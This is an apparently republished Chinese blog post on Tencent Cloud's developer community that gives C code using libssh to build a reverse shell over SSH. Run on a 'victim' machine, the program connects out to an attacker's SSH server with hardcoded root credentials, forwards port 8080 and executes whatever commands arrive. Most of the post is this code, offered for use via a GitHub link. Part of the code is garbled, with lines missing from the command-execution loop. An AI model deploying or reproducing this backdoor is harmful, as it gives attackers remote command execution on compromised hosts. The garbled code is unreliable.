学习
实践
活动
工具
TVP
写文章

通过SSH反向SHELL

在探索libssh之后,我想做一些有用的事情,所以我的想法是有一种通过SSH进行反向shell。

客户端通过端口转发连接到攻击者的ssh服务器

攻击者机器端口8080将通过ssh隧道在本地主机上打开

现在攻击者可以用netcat连接到8080端口,现在有一个伪shell,可以执行命令

不幸的是我只有一个关于如何制作一个交互式shell的小小的线索,目前还不能正常工作

Code:

#include

#include #include #include #include int pseudo_shell(ssh_session session){ int rc; ssh_channel channel; char buffer_ssh_in[256]; int nbytes, nwritten; int port = 0; int port2=1337; rc = ssh_channel_listen_forward(session, NULL, 8080, &port2); if (rc != SSH_OK) { fprintf(stderr, "Error opening remote port: %s\n", ssh_get_error(session)); return rc; } channel = ssh_channel_accept_forward(session, 60000, &port); if (channel == NULL) { fprintf(stderr, "Error waiting for incoming connection: %s\n", ssh_get_error(session)); return SSH_ERROR; } while (1) { //user input nbytes = ssh_channel_read(channel, buffer_ssh_in, sizeof(buffer_ssh_in), 0); if (nbytes = comalloc) { comalloc *= 2; comout = (char *)realloc(comout, comalloc); } memmove(comout + comlen, buffer, chread); comlen += chread; } //write output nbytes = strlen(comout); nwritten = ssh_channel_write(channel, comout, nbytes); if (nwritten != nbytes) { fprintf(stderr, "Error sending answer: %s\n", ssh_get_error(session)); ssh_channel_send_eof(channel); ssh_channel_free(channel); return SSH_ERROR; } printf("Sent answer\n"); } ssh_channel_send_eof(channel); ssh_channel_free(channel); return SSH_OK;}int main(){ ssh_session my_ssh_session; int rc; char *password; // Open session and set options my_ssh_session = ssh_new(); if (my_ssh_session == NULL) exit(-1); ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "192.168.116.215"); ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, "root"); // Connect to server rc = ssh_connect(my_ssh_session); if (rc != SSH_OK) { fprintf(stderr, "Error connecting to localhost: %s\n", ssh_get_error(my_ssh_session)); ssh_free(my_ssh_session); exit(-1); } // Authenticate ourselves // Give password here password = "password"; rc = ssh_userauth_password(my_ssh_session, NULL, password); if (rc != SSH_AUTH_SUCCESS) { fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)); ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session); exit(-1); } pseudo_shell(my_ssh_session); ssh_disconnect(my_ssh_session); ssh_free(my_ssh_session);}

可以通过GitHub地址获取:https://github.com/govolution/stuff/blob/master/ssh_reverse_pseudo_shell.cpp

在“受害者”机器上编译并执行之后:

现在你已经拥有shell了

你如果想知道更多可以访问:

http://api.libssh.org/master/libssh_tutor_forwarding.html

https://rosettacode.org/wiki/Get_system_command_output

以上小姐姐所述

我司一概不负责

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20171229A0GPOR00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码关注腾讯云开发者

领取腾讯云代金券